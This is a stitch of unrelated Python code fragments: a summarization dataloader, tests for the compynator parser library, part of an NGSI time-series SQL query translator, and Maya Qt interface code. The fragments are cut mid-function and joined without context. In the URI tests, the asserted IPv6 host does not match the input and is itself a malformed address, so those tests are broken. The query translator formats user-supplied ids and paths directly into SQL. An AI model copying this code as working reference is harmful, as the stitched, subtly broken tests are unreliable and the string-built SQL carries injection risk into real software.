xs = self.dataset
return xs
def weighted_choice(self, weights, random=random):
""" Given a list of weights [w_0, w_1, ..., w_n-1],
return an index i in range(n) with probability proportional to w_i. """
rnd = random.random() * sum(weights)
for i, w in enumerate(weights):
if w<0:
raise ValueError("Negative weight encountered.")
rnd -= w
if rnd < 0:
return i
raise ValueError("Sum of weights is not positive")
def preprocess(self, ex, is_test):
token_EOS = [2]
token_EOT = [16]
src = ex['src']
tgt = ex['tgt'][:self.args.max_tgt_len][:-1]+token_EOT
src_sent_labels = ex['src_sent_labels']
chosen_comments = []
clss = ex['clss']
clss = list(filter(lambda x: x < 512, clss))
segs = ex['segs']
likes = [x+1 for x in ex['likes']][:len(clss)]
if len(likes) < self.args.n_comments:
chosen_comments = range(len(likes))
while len(chosen_comments) < self.args.n_comments and len(likes) >= self.args.n_comments:
chosen_like = self.weighted_choice(likes)
if chosen_like not in chosen_comments:
chosen_comments.append(chosen_like)
if(not self.args.use_interval):
segs=[0]*len(segs)
#likes = [x+1 for x in ex['likes']][:len(clss)]
src_txt = ex['src_txt']
tgt_txt = ex['tgt_txt']
tgt_comment = []
for chosen_like in chosen_comments:
if chosen_like < len(likes) - 1:
tgt_comment += src[clss[chosen_like]+1:clss[chosen_like+1]-1]
else:
tgt_comment += src[clss[chosen_like]+1:len(src)-2]
if self.args.predict_title:
tgt += tgt_comment
else:
tgt = [6] + tgt_comment
end_id = [src[-1]]
src = src[:-1][:self.args.max_pos - 1] + end_id
tgt = tgt[:-1][:self.args.max_pos - 1] + token_EOS
segs = segs[:self.args.max_pos]
max_sent_id = bisect.bisect_left(clss, self.args.max_pos)
src_sent_labels = src_sent_labels[:max_sent_id]
clss = clss[:max_sent_id]
# src_txt = src_txt[:max_sent_id]
#temp_dict = {
# "src_txt": src_txt,
# "src": src,
# "tgt_txt": tgt_txt,
# "tgt": tgt,
# "src_sent_labels":src_sent_labels,
# "segs":segs,
# "clss": clss
#}
# json.dump(temp_dict, open("data_sample.json","w", encoding="utf-8"), ensure_ascii=False)
# sys.exit()
if(is_test):
return src, tgt, segs, clss, src_sent_labels, likes, src_txt, tgt_txt
else:
return src, tgt, segs, clss, src_sent_labels, likes
def batch_buffer(self, data, batch_size):
minibatch, size_so_far = [], 0
for ex in data:
if(len(ex['src'])==0):
continue
ex = self.preprocess(ex, self.is_test)
if(ex is None):
continue
minibatch.append(ex)
size_so_far = self.batch_size_fn(ex, len(minibatch))
if size_so_far == batch_size:
yield minibatch
minibatch, size_so_far = [], 0
elif size_so_far > batch_size:
yield minibatch[:-1]
minibatch, size_so_far = minibatch[-1:], self.batch_size_fn(ex, 1)
if minibatch:
yield minibatch
def batch(self, data, batch_size):
"""Yield elements from data in chunks of batch_size."""
minibatch, size_so_far = [], 0
for ex in data:
minibatch.append(ex)
size_so_far = self.batch_size_fn(ex, len(minibatch))
if size_so_far == batch_size:
yield minibatch
minibatch, size_so_far = [], 0
elif size_so_far > batch_size:
yield minibatch[:-1]
minibatch, size_so_far = minibatch[-1:], self.batch_size_fn(ex, 1)
if minibatch:
yield minibatch
def create_batches(self):
""" Create batches """
data = self.data()
for buffer in self.batch_buffer(data, self.batch_size * 300):
if (self.args.task == 'abs'):
p_batch = sorted(buffer, key=lambda x: len(x[2]))
p_batch = sorted(p_batch, key=lambda x: len(x[1]))
else:
p_batch = sorted(buffer, key=lambda x: len(x[2]))
p_batch = self.batch(p_batch, self.batch_size)
p_batch = list(p_batch)
if (self.shuffle):
random.shuffle(p_batch)
for b in p_batch:
if(len(b)==0):
continue
yield b
def __iter__(self):
while True:
self.batches = self.create_batches()
for idx, minibatch in enumerate(self.batches):
# fast-forward if loaded from state
if self._iterations_this_epoch > idx:
continue
self.iterations += 1
self._iterations_this_epoch += 1
batch = Batch(minibatch, self.device, self.is_test)
yield batch
return
class TextDataloader(object):
def __init__(self, args, datasets, batch_size,
device, shuffle, is_test):
self.args = args
self.batch_size = batch_size
self.device = device
def data(self):
if self.shuffle:
random.shuffle(self.dataset)
xs = self.dataset
return xs
def preprocess(self, ex, is_test):
src = ex['src']
tgt = ex['tgt'][:self.args.max_tgt_len][:-1] + [2]
src_sent_labels = ex['src_sent_labels']
segs = ex['segs']
if (not self.args.use_interval):
segs = [0] * len(segs)
clss = ex['clss']
src_txt = ex['src_txt']
tgt_txt = ex['tgt_txt']
end_id = [src[-1]]
src = src[:-1][:self.args.max_pos - 1] + end_id
segs = segs[:self.args.max_pos]
max_sent_id = bisect.bisect_left(clss, self.args.max_pos)
src_sent_labels = src_sent_labels[:max_sent_id]
clss = clss[:max_sent_id]
# src_txt = src_txt[:max_sent_id]
if (is_test):
return src, tgt, segs, clss, src_sent_labels, src_txt, tgt_txt
else:
return src, tgt, segs, clss, src_sent_labels
def batch_buffer(self, data, batch_size):
minibatch, size_so_far = [], 0
for ex in data:
if (len(ex['src']) == 0):
continue
ex = self.preprocess(ex, self.is_test)
if (ex is None):
continue
minibatch.append(ex)
size_so_far = simple_batch_size_fn(ex, len(minibatch))
if size_so_far == batch_size:
yield minibatch
minibatch, size_so_far = [], 0
elif size_so_far > batch_size:
yield minibatch[:-1]
minibatch, size_so_far = minibatch[-1:], simple_batch_size_fn(ex, 1)
if minibatch:
yield minibatch
def create_batches(self):
""" Create batches """
data = self.data()
for buffer in self.batch_buffer(data, self.batch_size * 300):
if (self.args.task == 'abs'):
p_batch = sorted(buffer, key=lambda x: len(x[2]))
p_batch = sorted(p_batch, key=lambda x: len(x[1]))
| |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# PYTHONPATH=. python3 tests/test_benchmark.py
import ast
import re
import sys
import unittest
from urllib.parse import urlparse, ParseResult
import timeit
try:
import pyparsing
except ImportError:
pass
from compynator import *
class PythonExprTest(unittest.TestCase):
def setUp(self):
# Translated from https://github.com/gvanrossum/pegen/blob/ec2b354f64f6dbfcb46133757fe4c0e07880f526/test/test_pegen.py#L232
ident = Alpha + Alnum.repeat()
atom = (
ident.value(lambda v: ast.Name(id=v, ctx=ast.Load())) |
Digit.repeat(1).value(lambda v: ast.Constant(
value=ast.literal_eval(v)))
)
expr = Forward()
factor = (
Terminal('(').then(expr).skip(')') |
atom
)
term = Forward()
term.is_(
term.skip('*').then(factor,
lambda l, r: ast.BinOp(l, ast.Mult(), r)) ^
term.skip('/').then(factor,
lambda l, r: ast.BinOp(l, ast.Div(), r)) ^
factor
)
expr.is_(
expr.skip('+').then(term, lambda l, r: ast.BinOp(l, ast.Add(), r)) ^
expr.skip('-').then(term, lambda l, r: ast.BinOp(l, ast.Sub(), r)) ^
term
)
start = expr.skip(Terminal('\n').repeat(0, 1)).filter(
lambda r: not r.remain).value(
lambda v: ast.fix_missing_locations(
ast.Expression(v, lineno=1, col_offset=0)))
self.parser = start
def test_python_expr(self):
parsed_results = self.parser('(1+2*3+5)/(6-2)\n')
self.assertEqual(len(parsed_results), 1)
tree = next(iter(parsed_results)).value
code = compile(tree, "", "eval")
val = eval(code)
self.assertEqual(val, 3.0)
class ParseUriTest(unittest.TestCase):
class Node:
pass
class CompositeNode(Node):
def __init__(self, *children):
self.children = []
for child in children:
self.add_child(child)
def add_child(self, node):
self.children.append(node)
def pprint(self, level=0, indent=4):
print(' ' * level * indent, self.__class__.__name__)
for child in self.children:
if child:
child.pprint(level + 1, indent)
def __getitem__(self, index):
return self.children[index]
class LeafNode(Node):
def __init__(self, value):
self.value = value
def pprint(self, level=0, indent=4):
print(' ' * level * indent, self.__class__.__name__, self.value)
class Scheme(LeafNode):
def __init__(self, scheme):
super().__init__(scheme)
class Path(LeafNode):
def __init__(self, path):
super().__init__(path)
class Query(LeafNode):
def __init__(self, query):
super().__init__(query)
class Fragment(LeafNode):
def __init__(self, fragment):
super().__init__(fragment)
class UserInfo(LeafNode):
def __init__(self, userinfo):
super().__init__(userinfo)
class Host(LeafNode):
def __init__(self, host):
super().__init__(host)
class Port(LeafNode):
def __init__(self, port):
super().__init__(port)
class Authority(CompositeNode):
def __init__(self, userinfo, host, port):
if userinfo is None:
userinfo = ParseUriTest.UserInfo(None)
if host is None:
host = ParseUriTest.Host(None)
if port is None:
port = ParseUriTest.Port(None)
super().__init__(userinfo, host, port)
class HierPart(CompositeNode):
def __init__(self, authority, path):
if authority is None:
authority = ParseUriTest.Authority(None, None, None)
if path is None:
path = ParseUriTest.Path(None)
super().__init__(authority, path)
class Uri(CompositeNode):
def __init__(self, scheme, hier_part, query, fragment):
if scheme is None:
scheme = ParseUriTest.Scheme(None)
if hier_part is None:
hier_part = ParseUriTest.HierPart(None, None)
if query is None:
query = ParseUriTest.Query(None)
if fragment is None:
fragment = ParseUriTest.Fragment(None)
super().__init__(scheme, hier_part, query, fragment)
def create_query(v):
return Query(v)
def create_fragment(v):
return Fragment(v)
def create_path(v):
return Path(v)
def setUp(self):
# See Appendix A in https://tools.ietf.org/html/rfc3986.
sub_delims = One.where(lambda c: c in "!$&'()*+,;=")
gen_delims = One.where(lambda c: c in ':/?#[]@')
reserved = gen_delims | sub_delims
unreserved = Alpha | Digit | '-' | '.' | '_' | '~'
pct_encoded = '%' + HexDigit + HexDigit
pchar = unreserved | pct_encoded | sub_delims | ':' | '@'
query = (pchar | '/' | '?').repeat().value(self.Query)
fragment = (pchar | '/' | '?').repeat().value(self.Fragment)
segment = pchar.repeat()
segment_nz = pchar.repeat(1)
segment_nz_nc = (unreserved | pct_encoded | sub_delims | '@').repeat(1)
path_empty = Empty
path_rootless = (segment_nz + ('/' + segment).repeat())
path_noscheme = (segment_nz_nc + ('/' + segment).repeat())
path_absolute = ('/' + ((segment_nz + ('/' + segment).repeat()) |
Empty))
path_abempty = ('/' + segment).repeat()
path = (path_abempty | path_absolute | path_noscheme | path_rootless
| path_empty)
reg_name = (unreserved | pct_encoded | sub_delims).repeat()
dec_octet = (Digit |
(One.where(lambda c: '1' <= c <= '9') + Digit) |
('1' + Digit + Digit) |
('2' + One.where(lambda c: '0' <= c <= '4') + Digit) |
('25' + One.where(lambda c: '0' <= c <= '5')))
ipv4address = (dec_octet + '.' + dec_octet + '.'
+ dec_octet + '.' + dec_octet)
h16 = HexDigit.repeat(lower=1, upper=4)
ls32 = (h16 + ':' + h16) | ipv4address
h16c = h16 + ':'
ipv6address = (
(h16c.repeat(6, 6) + ls32) |
('::' + h16c.repeat(5, 5) + ls32) |
(h16.repeat(0, 1) + '::' + h16c.repeat(4, 4) + ls32) |
((h16c.repeat(0, 1) + h16).repeat(0, 1) + '::' +
h16c.repeat(3, 3) + ls32) |
((h16c.repeat(0, 2, take_all=True) + h16).repeat(0, 1) + '::' +
h16c.repeat(2, 2) + ls32) |
((h16c.repeat(0, 3, take_all=True) + h16).repeat(0, 1) + '::' +
h16c + ls32) |
((h16c.repeat(0, 4, take_all=True) + h16).repeat(0, 1) + '::' +
ls32) |
((h16c.repeat(0, 5, take_all=True) + h16).repeat(0, 1) + '::' +
h16) |
((h16c.repeat(0, 6, take_all=True) + h16).repeat(0, 1) + '::')
)
ipvfuture = ('v' + HexDigit + '.' +
(unreserved | sub_delims | ':').repeat(lower=1))
ip_literal = '[' + (ipv6address | ipvfuture) + ']'
port = Digit.repeat().value(self.Port)
port_or_empty = Terminal(':').then(port) | Empty.value(None)
host = (ip_literal | ipv4address | reg_name).value(self.Host)
userinfo = (unreserved | pct_encoded | sub_delims | ':').repeat().value(
self.UserInfo)
userinfo_or_empty = userinfo.skip('@') | Empty.value(None)
authority = userinfo_or_empty.then(host, lambda u, h: (u, h)).then(
port_or_empty, lambda uh, p: self.Authority(uh[0], uh[1], p))
scheme = (Alpha + (Alpha | Digit | '+' | '-' | '.').repeat()).value(
self.Scheme)
relative_part = (
Terminal('//').then(authority).then(path_abempty,
lambda a, p: self.HierPart(a, self.Path(p))) |
path_absolute.value(
lambda v: self.HierPart(None, self.Path(v))) |
path_noscheme.value(
lambda v: self.HierPart(None, self.Path(v))) |
path_empty.value(
lambda v: self.HierPart(None, self.Path(v)))
)
query_or_empty = Terminal('?').then(query) | Empty.value(None)
fragment_or_empty = Terminal('#').then(fragment) | Empty.value(None)
relative_ref = \
relative_part.then(query_or_empty, lambda h, q: (h, q)).then(
fragment_or_empty, lambda hq, f: self.Uri(
None, hq[0], hq[1], f))
hier_part = (
Terminal('//').then(authority).then(path_abempty,
lambda a, p: self.HierPart(a, self.Path(p))) |
path_absolute.value(
lambda v: self.HierPart(None, self.Path(v))) |
path_rootless.value(
lambda v: self.HierPart(None, self.Path(v))) |
path_empty.value(
lambda v: self.HierPart(None, self.Path(v)))
)
uri = scheme.skip(':').then(hier_part, lambda s, h: (s, h)).then(
query_or_empty, lambda sh, q: (sh[0], sh[1], q)).then(
fragment_or_empty, lambda shq, f: self.Uri(
shq[0], shq[1], shq[2], f))
absolute_uri = scheme + ':' + hier_part + (('?' + query) | Empty)
uri_reference = uri | relative_ref
self.parser = uri_reference
self.url = 'http://www.ics.uci.edu/pub/ietf/uri/?query#fragment'
return self.parser
def test_parse_relative(self):
prs = self.parser(self.url.lstrip('http://'))
self.assertEqual(len(prs), 1)
pr = next(iter(prs))
self.assertEqual(pr.remain, '')
r = pr.value
self.assertEqual(r.children[0].value, None)
self.assertEqual(r.children[1][0][1].value, None)
self.assertEqual(r.children[1][1].value,
'www.ics.uci.edu/pub/ietf/uri/')
self.assertEqual(r.children[2].value, 'query')
self.assertEqual(r.children[3].value, 'fragment')
def test_parse_no_scheme(self):
prs = self.parser(self.url.lstrip('http:'))
self.assertEqual(len(prs), 1)
pr = next(iter(prs))
self.assertEqual(pr.remain, '')
r = pr.value
self.assertEqual(r.children[0].value, None)
self.assertEqual(r.children[1][0][1].value, 'www.ics.uci.edu')
self.assertEqual(r.children[1][1].value, '/pub/ietf/uri/')
self.assertEqual(r.children[2].value, 'query')
self.assertEqual(r.children[3].value, 'fragment')
def test_parse_uri(self):
prs = self.parser(self.url)
self.assertEqual(len(prs), 1)
pr = next(iter(prs))
self.assertEqual(pr.remain, '')
r = pr.value
self.assertEqual(r.children[0].value, 'http')
self.assertEqual(r.children[1][0][1].value, 'www.ics.uci.edu')
self.assertEqual(r.children[1][1].value, '/pub/ietf/uri/')
self.assertEqual(r.children[2].value, 'query')
self.assertEqual(r.children[3].value, 'fragment')
def test_urlparse(self):
r = urlparse(self.url)
self.assertEqual(r.scheme, 'http')
self.assertEqual(r.netloc, 'www.ics.uci.edu')
self.assertEqual(r.path, '/pub/ietf/uri/')
self.assertEqual(r.query, 'query')
self.assertEqual(r.fragment, 'fragment')
def test_ipv6_okay(self):
url = 'https://[2001:db8:85a3::8a2e:370:7334]:443/'
prs = self.parser(url)
self.assertEqual(len(prs), 1)
pr = next(iter(prs))
self.assertEqual(pr.remain, '')
r = pr.value
self.assertEqual(r.children[0].value, 'https')
self.assertEqual(
r.children[1][0][1].value, '[2001:fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b:370:7334]')
self.assertEqual(r.children[1][0][2].value, '443')
self.assertEqual(r.children[1][1].value, '/')
self.assertEqual(r.children[2].value, None)
self.assertEqual(r.children[3].value, None)
def test_ipv6_invalid(self):
url = 'https://[ghi::]:443/'
r = urlparse(url)
# urlparse *incorrectly* accepts this.
self.assertEqual(r.netloc, '[ghi::]:443')
prs = self.parser(url)
self.assertEqual(len(prs), 1)
pr = next(iter(prs))
self.assertNotEqual(pr.remain, '')
def test_ipfuture(self):
url = 'https://[v8.2001:fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b:370:7334]:443/'
r = urlparse(url)
self.assertEqual(r.netloc, '[v8.2001:fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b:370:7334]:443')
prs = self.parser(url)
self.assertEqual(len(prs), 1)
pr = next(iter(prs))
self.assertEqual(pr.remain, '')
r = pr.value
self.assertEqual(r.children[0].value, 'https')
self.assertEqual(
r.children[1][0][1].value, '[v8.2001:fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b:370:7334]')
self.assertEqual(r.children[1][0][2].value, '443')
self.assertEqual(r.children[1][1].value, '/')
self.assertEqual(r.children[2].value, None)
self.assertEqual(r.children[3].value, None)
@unittest.skipUnless('pyparsing' in sys.modules, 'Need PyParsing')
class PyParsingTest(unittest.TestCase):
def setUp(self):
self._opn = {
"+" : operator.add,
"-" : operator.sub,
"*" : operator.mul,
"/" : operator.truediv,
}
self._expr_stack = []
self._expr = '-(1+2*3+5)/(6-2)'
self._create_parser()
self._create_pyparser()
def _create_parser(self):
def xo_yo(fo1, fo2):
if not fo1:
return fo2
return fo1[1](fo1[0], fo2[0]), fo2[1]
def xo_x(fo1, fo2):
if not fo1:
return fo2
return fo1[1](fo1[0], fo2)
fnumber = Regex(
re.compile(r"[+-]?\d+(?:\.\d*)?(?:[eE][+-]?\d+)?")).value(float)
plus, minus, mult, div = map(Terminal, '+-*/')
addop = (plus | minus).value(lambda o: self._opn[o])
multop = (mult | div).value(lambda o: self._opn[o])
expr = Forward()
sub_expr = Terminal('(').then(expr).skip(')')
factor = Terminal('-').repeat(0, 1).then(
fnumber | sub_expr, lambda x, y: -y if x else y)
term = factor.then(multop, lambda f, o: (f, o)).repeat(0, None,
xo_yo).then(factor, xo_x)
expr.is_(term.then(addop, lambda f, o: (f, o)).repeat(
0, None, xo_yo).then(term, xo_x))
self.parser = expr
def _create_pyparser(self):
# Copied from
# https://github.com/pyparsing/pyparsing/blob/master/examples/fourFn.py.
from pyparsing import (Literal, Group, Forward, Regex, ZeroOrMore,
Suppress)
def | |
where = " where table_name !~* '\"{}{}\"[.].*'"
stmt += where.format(TENANT_PREFIX, '.*')
try:
table_names = self._execute_query_via_cache(key,
"tableNames",
stmt,
[],
self.default_ttl)
except Exception as e:
self.sql_error_handler(e)
self.logger.error(str(e), exc_info=True)
return []
return [r[0] for r in table_names]
def _get_select_clause(self, attr_names, aggr_method, aggr_period):
if not attr_names:
return '*'
attrs = ['entity_type', 'entity_id']
if aggr_method:
if aggr_period:
attrs.append(
"DATE_TRUNC('{}',{}) as {}".format(
aggr_period, self.TIME_INDEX_NAME,
self.TIME_INDEX_NAME)
)
# TODO: https://github.com/orchestracities/ngsi-timeseries-api/issues/106
m = '{}("{}") as "{}"'
attrs.extend(m.format(aggr_method, a, a) for a in set(attr_names))
else:
attrs.append(self.TIME_INDEX_NAME)
attrs.extend('"{}"'.format(a) for a in attr_names)
select = ','.join(attrs)
return select
def _get_limit(self, limit, last_n):
# https://crate.io/docs/crate/reference/en/latest/general/dql/selects.html#limits
default_limit = self.config.default_limit()
if limit is None or limit > default_limit:
limit = default_limit
if last_n is None:
last_n = limit
if limit < 1:
raise InvalidParameterValue(
f"limit should be >=1 and <= {default_limit}.")
if last_n < 1:
raise InvalidParameterValue(
f"last_n should be >=1 and <= {default_limit}.")
return min(last_n, limit)
def _get_where_clause(self, entity_ids, from_date, to_date, fiware_sp=None,
geo_query=None):
clauses = []
where_clause = ""
if entity_ids:
ids = ",".join("'{}'".format(e) for e in entity_ids)
clauses.append(" entity_id in ({}) ".format(ids))
if from_date:
clauses.append(" {} >= '{}'".format(self.TIME_INDEX_NAME,
self._parse_date(from_date)))
if to_date:
clauses.append(" {} <= '{}'".format(self.TIME_INDEX_NAME,
self._parse_date(to_date)))
if fiware_sp:
# Match prefix of fiware service path
if fiware_sp == '/':
clauses.append(
" " + FIWARE_SERVICEPATH + " ~* '/.*'")
else:
clauses.append(
" " + FIWARE_SERVICEPATH + " ~* '"
+ fiware_sp + "($|/.*)'")
else:
# Match prefix of fiware service path
clauses.append(" " + FIWARE_SERVICEPATH + " = ''")
geo_clause = self._get_geo_clause(geo_query)
if geo_clause:
clauses.append(geo_clause)
if len(clauses) > 0:
where_clause = "where" + " and ".join(clauses)
return where_clause
@staticmethod
def _parse_date(date):
try:
return dateutil.parser.isoparse(date.strip('\"')).isoformat()
except Exception as e:
raise InvalidParameterValue(date, "**fromDate** or **toDate**")
@staticmethod
def _is_iso_date(date):
try:
dateutil.parser.isoparse(date.strip('\"')).isoformat()
return True
except Exception as e:
return False
@staticmethod
def _parse_limit(limit):
if (not (limit is None or isinstance(limit, int))):
raise InvalidParameterValue(limit, "limit")
return limit
@staticmethod
def _parse_last_n(last_n):
if (not (last_n is None or isinstance(last_n, int))):
raise InvalidParameterValue(last_n, "last_n")
return last_n
def _get_geo_clause(self, geo_query: SlfQuery = None) -> Optional[str]:
raise NotImplementedError
def _get_order_group_clause(self, aggr_method, aggr_period,
select_clause, last_n):
order_by = []
group_by = []
# Group By
if aggr_method and select_clause != "*":
group_by.extend(["entity_type", "entity_id"])
if aggr_period:
# Note: If alias shadows a real table column,
# grouping will NOT be applied on the aliased column
gb = "DATE_TRUNC('{}', {})".format(
aggr_period, self.TIME_INDEX_NAME)
group_by.append(gb)
# Order by
direction = "DESC" if last_n else "ASC"
if aggr_method:
if aggr_period:
# consider always ordering by entity_id also
order_by.extend(["entity_type", "entity_id"])
order_by.append(
"{} {}".format(self.TIME_INDEX_NAME, direction))
else:
order_by.append("{} {}".format(self.TIME_INDEX_NAME, direction))
clause = ""
if group_by:
clause = "GROUP BY {}".format(",".join(group_by))
if order_by:
clause += " ORDER BY {}".format(",".join(order_by))
return clause
def query(self,
attr_names=None,
entity_type=None,
entity_id=None,
entity_ids=None,
where_clause=None,
aggr_method=None,
aggr_period=None,
aggr_scope=None,
from_date=None,
to_date=None,
last_n=None,
limit=10000,
offset=0,
fiware_service=None,
fiware_servicepath=None,
geo_query: SlfQuery = None):
"""
This translator method is used by all API query endpoints.
:param attr_names:
Array of attribute names to query for.
:param entity_type:
(Optional). NGSI Entity Type to query about. Unique and optional
as long as there are no 2 equal NGSI ids for any NGSI type.
:param entity_id:
NGSI Id of the entity you ask for. Cannot be used with entity_ids.
:param entity_ids:
Array of NGSI ids to consider in the response. Cannot be used with
entity_id.
:param where_clause:
(Optional), to use a custom SQL query (not open to public API).
:param aggr_method:
(Optional), function to apply to the queried values. Must be one
of the VALID_AGGR_METHODS (e.g, sum, avg, etc). You need to specify
at least one attribute in attr_names, otherwise this will be
ignored.
:param aggr_period:
(Optional), only valid when using aggr_method. Defines the time
scope on to which the aggr_method will be applied, hence defines
also the number of values that will be returned. Must be one of the
VALID_AGGR_PERIODS (e.g, hour). I.e., querying avg per hour will
return 24 values times the number of days of available measurements
:param aggr_scope: (Not Implemented). Defaults to "entity", which means
the aggrMethod will be applied N times, once for each entityId.
"global" instead would allow cross-entity_id aggregations.
:param from_date:
(Optional), used to filter results, considering only from this date
inclusive.
:param to_date:
(Optional), used to filter results,
considering only up to this date inclusive.
:param last_n:
(Optional), used to filter results, return only the last_n elements
of what would be the result of the query once all filters where
applied.
:param limit:
(Optional), used to filter results, return up to limit elements
of what would be the result of the query once all filters where
applied.
:param offset:
(Optional), used to page results.
:param fiware_service:
(Optional), used to filter results, considering in the result only
entities in this FIWARE Service.
:param fiware_servicepath:
(Optional), used to filter results, considering in the result only
entities in this FIWARE ServicePath.
:param geo_query:
(Optional), filters results with an NGSI geo query.
:return:
The shape of the response is always something like this:
[{
'type': 'Room',
'id': 'Room1', or 'ids': ['Room1', 'Room2'],
'index': [t0, t1, ..., tn],
'attr_1': {
'index': [t0, t1, ..., tn], # index of this attr (if different)
'values': [v0, v1, ..., vn],
'type': Number
},
...,
'attr_N': ...
},...
]
It returns an array of dictionaries, each representing a query result
on a particular NGSI Entity Type. Each of the dicts in this array
consists of the following attributes.
'type' is the NGSI Entity Type of the response.
'id' or 'ids'. id if the response contains data from a specific NGSI
entity (with that id) or ids in the case the response aggregates data
from multiple entities (those with those ids). You get one or the
other, not both.
'index': The time index applying to the response, applies to all
attributes included in the response. It may not be present if each
attribute has its own time index array, in the cases where attributes
are measured at different moments in time. Note since this is a
"global" time index for the entity, it may contain some NULL values
where measurements were not available. It's an array containing time
in ISO format representation, typically in the original timezone the
Orion Notification used, or UTC if created within QL.
Each attribute in the response will be represented by a dictionary,
with an array called 'values' containing the actual historical values
of the attributes as queried. An attribute 'type' will have the
original NGSI type of the attribute (i.e, the type of each of the
elements now in the values array). The type of an attribute is not
expected to change in time, that'd be an error. Additionally, it may
contain an array called 'index', just like the global index
discussed above but for this specific attribute. Thus, this 'index'
will never contain NONE values.
If the user did not specify an aggrMethod, the response will not mix
measurements of different entities in the same values array. So in this
case, there will be many dictionaries in the response array, one for
each NGSI Entity.
When using aggrPeriod, the index array is a completely new index,
composed of time steps of the original index of the attribute but
zeroing the less significant bits of time. For example, if there were
measurements in time 2018-04-03T08:15:15 and 2018-04-03T09:01:15, with
aggrPeriod = minute the new index will contain, at least, the steps
2018-04-03T08:15:00 and 2018-04-03T09:01:00 respectively.
:raises:
ValueError in case of misuse of the attributes.
UnsupportedOption for still-to-be-implemented features.
crate.DatabaseError in case of errors with CrateDB interaction.
"""
last_n = self._parse_last_n(last_n)
limit = self._parse_limit(limit)
if last_n == 0 or limit == 0:
return []
if entity_id and entity_ids:
raise NGSIUsageError("Cannot use both entity_id and entity_ids "
"params in the same call.")
if aggr_method and aggr_method.lower() not in VALID_AGGR_METHODS:
raise UnsupportedOption("aggr_method={}".format(aggr_method))
if aggr_period and aggr_period.lower() not in VALID_AGGR_PERIODS:
raise UnsupportedOption("aggr_period={}".format(aggr_period))
# TODO check also entity_id and entity_type to not | |
,2)
tip = lang.Lang(en=u'Deformer filter / Deformation object\nLeft click >> Single selection\nShift + Left click >> Multiple selection / release\nRight click >> Select all',
ja=u'選択フィルター / デフォメーション オブジェクト\n左クリック→単独選択\nシフト+左クリック→複数選択/解除\n右クリック→全選択').output()
self.select_deform_but = make_flat_button(icon=':/pickDeformerObj.png', name='', text=text_col, bg=hilite, w_max=filter_w, h_max=filter_h, tip=tip)
self.select_deform_but.clicked.connect(lambda : self.select_filter_mode(mode=4))
self.select_deform_but.rightClicked.connect(lambda : self.select_filter_mode(mode=-1))
self.main_layout.addWidget(self.select_deform_but, vn, 8, 1 ,2)
tip = lang.Lang(en=u'Deformer filter / Other object\nLeft click >> Single selection\nShift + Left click >> Multiple selection / release\nRight click >> Select all',
ja=u'選択フィルター / その他のオブジェクト\n左クリック→単独選択\nシフト+左クリック→複数選択/解除\n右クリック→全選択').output()
self.select_other_but = make_flat_button(icon=':/pickOtherObj.png', name='', text=text_col, bg=hilite, w_max=filter_w, h_max=filter_h, tip=tip)
self.select_other_but.clicked.connect(lambda : self.select_filter_mode(mode=5))
self.select_other_but.rightClicked.connect(lambda : self.select_filter_mode(mode=-1))
self.main_layout.addWidget(self.select_other_but, vn, 10, 1 ,1)
'''
self.filter_group = QButtonGroup(self)#ボタンをまとめる変数を定義
self.filter_group.addButton(self.select_all_but, 0)
self.filter_group.addButton(self.select_Marker_but, 1)
self.filter_group.addButton(self.select_joint_but, 2)
self.filter_group.addButton(self.select_surface_but, 3)
self.filter_group.addButton(self.select_curve_but, 4)
self.filter_group.addButton(self.select_deform_but, 5)
self.filter_group.button(0).setChecked(True)
self.filter_group.buttonClicked.connect(lambda : self.select_filter_mode(mode=self.filter_group .checkedId()))
self.select_filter_mode(mode=self.filter_group .checkedId())#フィルターを初期化しておく
'''
vn+=1
self.main_layout.addWidget(self.make_ds_line(), vn, 0, 1 ,11)
vn+=1
#選択入力ラインエディット--------------------------------------------------------------------------------
#フィルターセットしているときにウインドウ触るとフォーカスとって暴発することがあるのを防ぐためのダミーライン
self.dummy_line = self.make_line_edit(text=string_col, bg=bg_col)
self.dummy_line.setVisible(False)
self.main_layout.addWidget(self.dummy_line, vn, 0, 1, 11)
vn+=1
self.selection_line = self.make_line_edit(text=string_col, bg=bg_col)
self.main_layout.addWidget(self.selection_line, vn, 0, 1, 11)
self.selection_line.textChanged.connect(self.keep_pre_search_line)
self.selection_line.editingFinished.connect(self.search_node)
vn+=1
#厳密に位置調整
ud_w = 39
ud_h = 6
lr_w = 13
lr_h = 16
lr_min = 18
self.index_line = self.make_line_edit(text=string_col, bg=bg_col)
self.index_line.editingFinished.connect(self.search_component)
self.main_layout.addWidget(self.index_line, vn, 0, 2, 8)
self.pick_up = make_flat_button(icon=':/arrowUp', name='', text=text_col, bg=ui_color, checkable=False, w_max=ud_w, h_max=ud_h ,h_min=None)
self.pick_up.clicked.connect(lambda : self.pick_walk(mode='up'))
self.main_layout.addWidget(self.pick_up, vn, 8, 1, 3)
self.pick_down = make_flat_button(icon=':/arrowDown', name='', text=text_col, bg=ui_color, checkable=False, w_max=ud_w, h_max=ud_h ,h_min=None)
self.pick_down.clicked.connect(lambda : self.pick_walk(mode='down'))
self.main_layout.addWidget(self.pick_down, vn+1, 8, 1, 3)
self.pick_left = make_flat_button(icon=':/arrowLeft', name='', text=text_col, bg=ui_color, checkable=False, w_max=lr_w, h_max=lr_h ,h_min=lr_min)
self.pick_left.clicked.connect(lambda : self.pick_walk(mode='left'))
self.main_layout.addWidget(self.pick_left, vn, 8, 2, 1)
self.pick_right = make_flat_button(icon=':/arrowRight', name='', text=text_col, bg=ui_color, checkable=False, w_max=lr_w, h_max=lr_h ,h_min=lr_min)
self.pick_right.clicked.connect(lambda : self.pick_walk(mode='right'))
self.main_layout.addWidget(self.pick_right, vn, 10, 2, 1)
vn+=2
self.main_layout.addWidget(self.make_ds_line(), vn, 0, 1 ,11)
vn+=1
#検索タイプフィルタリング
vh = 0
hw = 2
fw = 23
fh =18
self.all_filter = make_flat_button(name='All', text=text_col, bg=hilite, checkable=True, w_max=fw, h_max=fh, tip='Search from all node types')
